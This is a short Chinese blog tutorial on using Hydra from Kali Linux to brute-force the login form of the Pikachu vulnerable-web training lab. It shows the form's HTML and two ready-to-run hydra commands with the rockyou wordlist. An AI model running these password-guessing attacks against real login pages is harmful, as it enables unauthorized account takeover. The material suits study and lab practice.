使用Hydra爆破表单
博客地址Github工具准备Kali LinuxWeb靶机(Github传送门)靶机表单内容如下<form method="post" action="bf_form.php"><label><span&
·
博客地址
Github
工具准备
- Kali Linux
- Web靶机(Github传送门)
靶机表单内容如下
<form method="post" action="bf_form.php">
<label>
<span>
<input type="text" name="username" placeholder="Username">
<i class="ace-icon fa fa-user"></i>
</span>
</label>
<br>
<label>
<span>
<input type="password" name="password" placeholder="Password">
<i class="ace-icon fa fa-lock"></i>
</span>
</label>
<div class="space"></div>
<div class="clearfix">
<label><input class="submit" name="submit" type="submit" value="Login"></label>
</div>
</form>
表单截图
开始爆破
假设域名为host.com,表单路径为/pikachu/vul/burteforce/bf_form.php
运行命令如下
hydra -l admin -P /root/rockyou.txt -s 80 -f host.com http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=Login:username or password is not exists~"
其中 /root/rockyou.txt
为Kali自带的爆破字典,正常路径位于 /usr/share/wordlists/rockyou.txt
;username or password is not exists~
为表单错误提示,hydra以此判定是否爆破成功。
运行结果如下
不指定用户名,使用用户名字典 /root/user.txt
hydra -L /root/user.txt -P /root/rockyou.txt -vV -s 80 -f host.com http-post-form "/pikachu/vul/burteforce/bf_form.php:username=^USER^&password=^PASS^&submit=Login:username or password is not exists~"
更多推荐
已为社区贡献1条内容
所有评论(0)